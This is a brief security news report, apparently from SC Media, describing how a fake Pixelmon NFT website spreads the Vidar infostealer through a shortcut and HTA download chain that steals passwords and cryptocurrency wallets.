Risk Assessments/Management, Breach, Malware

Vidar malware spread via phony Pixelmon NFT site

Threat actors have created a fake version of the Pixelmon non-fungible token website under pixelmon[.]pw, which then spreads that Vidar malware with cryptocurrency wallet-exfiltrating capabilities, according to BleepingComputer. MalwareHunterTeam discovered that while the fake Pixelmon site features an Installer.zip file with a corrupt executable, other files distributed by the website were found to distribute malware. The setup.zip file distributed by the malicious site was found to have the setup.lnk file, which then triggers the download of a system32.hta file that downloads the password-stealing Vidar malware. Execution of the file will prompt the Vidar sample to link with a Telegram channel and facilitate IP address retrieval from the command and control server. More modules will then be downloaded from the C2 for data exfiltration, with Vidar having the capability not only to steal browser and application passwords but also to conduct file searches throughout a computer, which would then allow it to steal cryptocurrency wallets, codes, authentication files, text files, backups, and password files.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.